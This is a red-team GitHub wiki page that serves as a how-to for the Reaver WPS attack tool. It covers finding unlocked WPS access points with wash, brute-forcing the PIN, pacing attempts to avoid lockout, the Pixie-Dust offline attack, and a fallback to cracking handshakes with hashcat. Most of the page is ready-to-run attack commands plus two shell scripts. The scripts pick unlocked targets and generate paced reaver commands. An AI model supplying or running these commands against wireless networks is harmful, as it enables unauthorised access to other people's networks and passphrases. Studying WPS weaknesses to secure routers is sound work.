Reaver - ikenpachi/Wireless-Attacks-Docs-Red-Team GitHub Wiki

Reaver – WPS Attack Tool

Introduction

Reaver performs an online brute-force attack against the Wi-Fi Protected Setup (WPS) registrar PIN and, once the PIN is recovered, retrieves the network's WPA/WPA2 passphrase (PSK) from the access point. The attack works because of how the PIN is validated: the eighth digit of the PIN is a checksum of the first seven, and the access point confirms the first four digits separately from the remaining three. An attacker therefore needs at most 10,000 + 1,000 = 11,000 attempts rather than 10^8, which is why a strong WPA2 passphrase offers no protection on a router that has WPS PIN mode enabled and does not rate-limit or lock WPS after failed attempts.
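The PIN arithmetic above, as an added example that is not code from the Reaver project: the checksum that fixes the eighth digit, a validity check for a candidate PIN, and the 11,000-attempt bound. It needs no wireless hardware and runs offline; the only assumption is the WPS specification's checksum algorithm, which is also the one Reaver implements.

```shell
#!/bin/sh
# Added example, not code from the Reaver project: the WPS PIN checksum and the
# reason the online brute force is bounded at 11,000 attempts. Runs offline.

# Checksum digit for the first seven digits of a WPS PIN (the WPS specification's
# algorithm: weights 3 and 1 alternate, starting from the rightmost digit).
wps_checksum() {
    # strip leading zeros so the shell does not parse "0001234" as octal
    pin=$(printf '%s' "$1" | sed 's/^0*//')
    pin=${pin:-0}
    accum=0
    while [ "$pin" -gt 0 ]; do
        accum=$(( accum + 3 * (pin % 10) ))
        pin=$(( pin / 10 ))
        accum=$(( accum + pin % 10 ))
        pin=$(( pin / 10 ))
    done
    echo $(( (10 - accum % 10) % 10 ))
}

# Succeeds (exit 0) only for an 8-digit PIN whose last digit matches the checksum.
wps_pin_valid() {
    case $1 in
        [0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]) ;;
        *) return 1 ;;
    esac
    first7=$(printf '%s' "$1" | cut -c1-7)
    last=$(printf '%s' "$1" | cut -c8)
    [ "$(wps_checksum "$first7")" = "$last" ]
}

# Upper bound on online attempts: the AP confirms the first half (4 digits) on its
# own, then the second half, whose last digit is fixed by the checksum (3 free digits).
wps_max_attempts() {
    echo $(( 10000 + 1000 ))
}

# Demo: 12345670, the PIN Reaver tries first by default, has checksum digit 0.
printf 'checksum for 1234567: %s\n' "$(wps_checksum 1234567)"
printf 'worst-case attempts: %s\n' "$(wps_max_attempts)"
```

Any PIN that fails wps_pin_valid is not worth an online attempt, which is exactly the pruning that turns a 10^8 search into one Reaver can finish in hours.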


Installation

Linux (Debian/Ubuntu)

sudo apt update && sudo apt install reaver -y

Arch Linux

sudo pacman -S reaver

macOS

Reaver is not natively available on macOS, but you can use a Linux VM or Kali Linux in a virtualized environment.


Identifying WPS-Enabled Networks

Before launching an attack, it is crucial to identify which networks have WPS enabled. This can be done using wash, a tool that comes with Reaver.

sudo wash -i wlan0mon --ignore-fcs

Explanation:

  • -i wlan0mon → Specifies the wireless interface, which must already be in monitor mode (for example via airmon-ng); on a managed interface wash shows nothing.
  • --ignore-fcs → Accepts frames whose frame check sequence is reported as bad; some drivers flag every captured frame this way, and without this option those networks never appear.

This command lists every access point that advertises WPS in its beacons, with its BSSID, channel, signal level (dBm), WPS version, whether WPS is currently locked (the Lck column), vendor and ESSID. Only entries with Lck set to No are worth attacking right away.


Running a Reaver Attack

Once a WPS-enabled network is found, Reaver can start brute-forcing its PIN.

sudo reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv

Explanation:

  • -i wlan0mon → Interface in monitor mode.
  • -b XX:XX:XX:XX:XX:XX → Target BSSID (replace with actual target BSSID).
  • -vv → Enables verbose mode for more detailed output.

Optimizing the Attack

Some routers rate-limit or lock WPS after a handful of failed PINs, so Reaver's pacing and protocol options matter more than raw speed:

sudo reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -c 6 -a -S -N -vv

Additional Options:

  • -c 6 → Fixes the channel to 6 (change according to the target); without it Reaver hops channels until it finds the BSSID.
  • -a → Auto-detects the best advanced options for the target AP.
  • -S → Uses small Diffie-Hellman keys (--dh-small) so each WPS exchange completes faster; it does not add a delay between attempts.
  • -N → Does not send NACK messages when out-of-order packets are received (--no-nacks); some APs stall without it.

Rate limiting is handled by the delay options, not by -S: -d <seconds> sets the pause between PIN attempts (default 1), -l <seconds> sets how long to wait once the AP reports WPS as locked (default 60), and -r x:y sleeps y seconds after every x attempts. Larger values are slower but keep an AP that locks after a few failures from locking for good.

Checking WPS Lock Status

Some routers lock WPS after multiple failed attempts and advertise that state in their beacons, so the quickest check is to re-run the wash command above and look at the Lck column. Reaver also detects the locked state during an attack and prints a rate-limiting warning, which you can watch for:

sudo reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv | grep -i "rate limiting"

Lines reading "WPS transaction failed" mean a single exchange failed and is being retried; they do not by themselves mean the AP is locked. If WPS is locked, wait it out (Reaver's -l delay does this automatically), or switch to the Pixie-Dust attack explained below, which needs only one completed M1-M3 exchange rather than thousands of PIN attempts. An AP that refuses every WPS exchange while locked will block that too.
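Both the target selection from wash output (the Identifying WPS-Enabled Networks section) and the lock check above come down to reading wash's Lck column. The script below, an added example that is not part of the Reaver or wash projects, filters a wash table down to unlocked WPS access points and prints a paced Reaver command for each one. It assumes the column layout printed by wash 1.6.x (BSSID, Ch, dBm, WPS, Lck, Vendor, ESSID; check your own version); the wash table it parses is constructed, not a real capture, and the commands are printed rather than executed so the script runs offline.

```shell
#!/bin/sh
# Added example (not part of the Reaver/wash projects): filter wash output down to
# WPS-enabled access points whose WPS is not locked, and print the Reaver command
# to use for each. Assumed column layout: the wash 1.6.x table
# "BSSID Ch dBm WPS Lck Vendor ESSID" (assumption; verify against your wash build).

# Constructed sample of wash output (not a real capture).
SAMPLE_WASH='BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
AA:BB:CC:DD:EE:01    6  -45  2.0  No   RalinkTe  LabNet-A
AA:BB:CC:DD:EE:02    1  -60  1.0  Yes  Broadcom  LabNet-B
AA:BB:CC:DD:EE:03   11  -52  2.0  No   Unknown   Lab Net C'

# Read wash output on stdin; print "BSSID CHANNEL" for each AP whose Lck column is "No".
wash_targets() {
    awk '
        $1 == "BSSID" || $1 ~ /^-+$/ { next }   # skip the two header rows
        $5 == "No" { print $1, $2 }
    '
}

# Read wash output on stdin; print "BSSID CHANNEL" for each AP wash reports as locked.
wash_locked() {
    awk '
        $1 == "BSSID" || $1 ~ /^-+$/ { next }
        $5 == "Yes" { print $1, $2 }
    '
}

# Build a paced Reaver command line for one target. -c, -d, -l and -r are real
# Reaver options; the pacing values (2 s between PINs, 300 s after a lock, a 15 s
# pause every 3 PINs) are illustrative starting points, not tuned numbers.
reaver_cmd() {
    bssid=$1; ch=$2; iface=${3:-wlan0mon}
    printf 'reaver -i %s -b %s -c %s -d 2 -l 300 -r 3:15 -vv\n' "$iface" "$bssid" "$ch"
}

# Wrappers over the constructed sample so the script runs without wash installed.
sample_targets() { printf '%s\n' "$SAMPLE_WASH" | wash_targets; }
sample_locked()  { printf '%s\n' "$SAMPLE_WASH" | wash_locked; }

# Print the command for each unlocked target (print only; nothing is executed).
sample_targets | while read -r bssid ch; do
    reaver_cmd "$bssid" "$ch"
done
```

To use it against live data, pipe real output in (sudo wash -i wlan0mon --ignore-fcs | wash_targets after sourcing the script) and run the printed commands one target at a time; a BSSID that moves from the wash_targets list to the wash_locked list mid-attack is the rate limiting the previous section describes.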


Pixie-Dust Attack (Offline WPS Exploit)

Reaver can hand the values from a single WPS exchange (the enrollee and registrar public keys, E-Hash1 and E-Hash2, the AuthKey and the enrollee nonce) to pixiewps, which recovers the PIN offline when the access point generated its secret nonces E-S1 and E-S2 from a weak or constant random source. This is the Pixie-Dust flaw published by Dominique Bongard in 2014, and it affects specific chipset firmware rather than WPS itself, so not every WPS-enabled router is exposed.

  1. Install pixiewps:
sudo apt install pixiewps -y
  2. Run Reaver in Pixie-Dust mode:
sudo reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv -K 1

Explanation:

  • -K 1 → Enables Pixie-Dust attack mode (--pixie-dust). This option exists only in the reaver-wps-fork-t6x build that Kali and Debian package as reaver; the original 1.4 release does not have it.

If the router is vulnerable, pixiewps computes the PIN offline in seconds to minutes, and Reaver then uses that PIN (current builds do this automatically; otherwise rerun Reaver with -p <PIN>) to retrieve the WPA passphrase in one further WPS exchange. Because the PIN recovery happens offline, rate limiting on the AP does not slow it down. If Reaver's output shows the exchange values but pixiewps reports no result, the AP's nonce generation is not weak and only the online brute force remains.


Additional Notes

  • Reaver works best with external Wi-Fi adapters that support monitor mode and packet injection, and with a strong signal to the target; a weak link causes timeouts that look like rate limiting.
  • Many modern routers ship with WPS disabled, with only push-button mode enabled, or with a lockout after a few failed PINs, any of which makes the online attack slow or impossible.
  • If WPS attacks fail, capture a WPA2 4-way handshake or PMKID with hcxdumptool and crack it offline with hashcat instead.
